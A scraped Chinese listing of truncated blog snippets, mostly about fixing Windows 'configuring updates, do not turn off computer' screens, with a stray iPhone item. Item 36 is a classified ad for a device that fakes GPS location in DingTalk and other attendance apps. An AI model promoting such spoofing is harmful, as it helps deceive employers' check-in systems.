  30. 准备配置windows 请勿关闭计算机 蓝屏,Win7开机总是出现提示“配置Windows请勿关机”...

    Win7系统开机启动时总是出现“配置Windows请勿关机”的提示&#xff0c;没过几秒后电脑自动重启&#xff0c;每次开机都这样无法进入系统&#xff0c;此时碰到这种现象的用户就可以使用以下5种方法解决问题。方法一&#xff1a;开机按下F8&#xff0c;在出现的Windows高级启动选…...

    2022/11/19 21:17:12
  31. 准备windows请勿关闭计算机要多久,windows10系统提示正在准备windows请勿关闭计算机怎么办...

    有不少windows10系统用户反映说碰到这样一个情况&#xff0c;就是电脑提示正在准备windows请勿关闭计算机&#xff0c;碰到这样的问题该怎么解决呢&#xff0c;现在小编就给大家分享一下windows10系统提示正在准备windows请勿关闭计算机的具体第一种方法&#xff1a;1、2、依次…...

    2022/11/19 21:17:11
  32. 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”的解决方法...

    今天和大家分享一下win7系统重装了Win7旗舰版系统后&#xff0c;每次关机的时候桌面上都会显示一个“配置Windows Update的界面&#xff0c;提示请勿关闭计算机”&#xff0c;每次停留好几分钟才能正常关机&#xff0c;导致什么情况引起的呢&#xff1f;出现配置Windows Update…...

    2022/11/19 21:17:10
  33. 电脑桌面一直是清理请关闭计算机,windows7一直卡在清理 请勿关闭计算机-win7清理请勿关机,win7配置更新35%不动...

    只能是等着&#xff0c;别无他法。说是卡着如果你看硬盘灯应该在读写。如果从 Win 10 无法正常回滚&#xff0c;只能是考虑备份数据后重装系统了。解决来方案一&#xff1a;管理员运行cmd&#xff1a;net stop WuAuServcd %windir%ren SoftwareDistribution SDoldnet start WuA…...

    2022/11/19 21:17:09
  34. 计算机配置更新不起,电脑提示“配置Windows Update请勿关闭计算机”怎么办?

    原标题&#xff1a;电脑提示“配置Windows Update请勿关闭计算机”怎么办&#xff1f;win7系统中在开机与关闭的时候总是显示“配置windows update请勿关闭计算机”相信有不少朋友都曾遇到过一次两次还能忍但经常遇到就叫人感到心烦了遇到这种问题怎么办呢&#xff1f;一般的方…...

    2022/11/19 21:17:08
  35. 计算机正在配置无法关机,关机提示 windows7 正在配置windows 请勿关闭计算机 ,然后等了一晚上也没有关掉。现在电脑无法正常关机...

    关机提示 windows7 正在配置windows 请勿关闭计算机 &#xff0c;然后等了一晚上也没有关掉。现在电脑无法正常关机以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容&#xff0c;让我们赶快一起来看一下吧&#xff01;关机提示 windows7 正在配…...

    2022/11/19 21:17:05
  36. 钉钉提示请勿通过开发者调试模式_钉钉请勿通过开发者调试模式是真的吗好不好用...

    钉钉请勿通过开发者调试模式是真的吗好不好用 更新时间:2020-04-20 22:24:19 浏览次数:729次 区域: 南阳 > 卧龙 列举网提醒您:为保障您的权益,请不要提前支付任何费用! 虚拟位置外设器!!轨迹模拟&虚拟位置外设神器 专业用于:钉钉,外勤365,红圈通,企业微信和…...

    2022/11/19 21:17:05
  37. 配置失败还原请勿关闭计算机怎么办,win7系统出现“配置windows update失败 还原更改 请勿关闭计算机”,长时间没反应,无法进入系统的解决方案...

    前几天班里有位学生电脑(windows 7系统)出问题了&#xff0c;具体表现是开机时一直停留在“配置windows update失败 还原更改 请勿关闭计算机”这个界面&#xff0c;长时间没反应&#xff0c;无法进入系统。这个问题原来帮其他同学也解决过&#xff0c;网上搜了不少资料&#x…...

    2022/11/19 21:17:04
  38. 一个电脑无法关闭计算机你应该怎么办,电脑显示“清理请勿关闭计算机”怎么办?...

    本文为你提供了3个有效解决电脑显示“清理请勿关闭计算机”问题的方法&#xff0c;并在最后教给你1种保护系统安全的好方法&#xff0c;一起来看看&#xff01;电脑出现“清理请勿关闭计算机”在Windows 7(SP1)和Windows Server 2008 R2 SP1中&#xff0c;添加了1个新功能在“磁…...

    2022/11/19 21:17:03
  39. 请勿关闭计算机还原更改要多久,电脑显示:配置windows更新失败,正在还原更改,请勿关闭计算机怎么办...

    许多用户在长期不使用电脑的时候&#xff0c;开启电脑发现电脑显示&#xff1a;配置windows更新失败&#xff0c;正在还原更改&#xff0c;请勿关闭计算机。。.这要怎么办呢&#xff1f;下面小编就带着大家一起看看吧&#xff01;如果能够正常进入系统&#xff0c;建议您暂时移…...

    2022/11/19 21:17:02
  40. 还原更改请勿关闭计算机 要多久,配置windows update失败 还原更改 请勿关闭计算机,电脑开机后一直显示以...

    配置windows update失败 还原更改 请勿关闭计算机&#xff0c;电脑开机后一直显示以以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容&#xff0c;让我们赶快一起来看一下吧&#xff01;配置windows update失败 还原更改 请勿关闭计算机&#x…...

    2022/11/19 21:17:01
  41. 电脑配置中请勿关闭计算机怎么办,准备配置windows请勿关闭计算机一直显示怎么办【图解】...

    不知道大家有没有遇到过这样的一个问题&#xff0c;就是我们的win7系统在关机的时候&#xff0c;总是喜欢显示“准备配置windows&#xff0c;请勿关机”这样的一个页面&#xff0c;没有什么大碍&#xff0c;但是如果一直等着的话就要两个小时甚至更久都关不了机&#xff0c;非常…...

    2022/11/19 21:17:00
  42. 正在准备配置请勿关闭计算机,正在准备配置windows请勿关闭计算机时间长了解决教程...

    当电脑出现正在准备配置windows请勿关闭计算机时&#xff0c;一般是您正对windows进行升级&#xff0c;但是这个要是长时间没有反应&#xff0c;我们不能再傻等下去了。可能是电脑出了别的问题了&#xff0c;来看看教程的说法。正在准备配置windows请勿关闭计算机时间长了方法一…...

    2022/11/19 21:16:59
  43. 配置失败还原请勿关闭计算机,配置Windows Update失败,还原更改请勿关闭计算机...

    我们使用电脑的过程中有时会遇到这种情况&#xff0c;当我们打开电脑之后&#xff0c;发现一直停留在一个界面&#xff1a;“配置Windows Update失败&#xff0c;还原更改请勿关闭计算机”&#xff0c;等了许久还是无法进入系统。如果我们遇到此类问题应该如何解决呢&#xff0…...

    2022/11/19 21:16:58
  44. 如何在iPhone上关闭“请勿打扰”

    Apple’s “Do Not Disturb While Driving” is a potentially lifesaving iPhone feature, but it doesn’t always turn on automatically at the appropriate time. For example, you might be a passenger in a moving car, but your iPhone may think you’re the one dri…...

    2022/11/19 21:16:57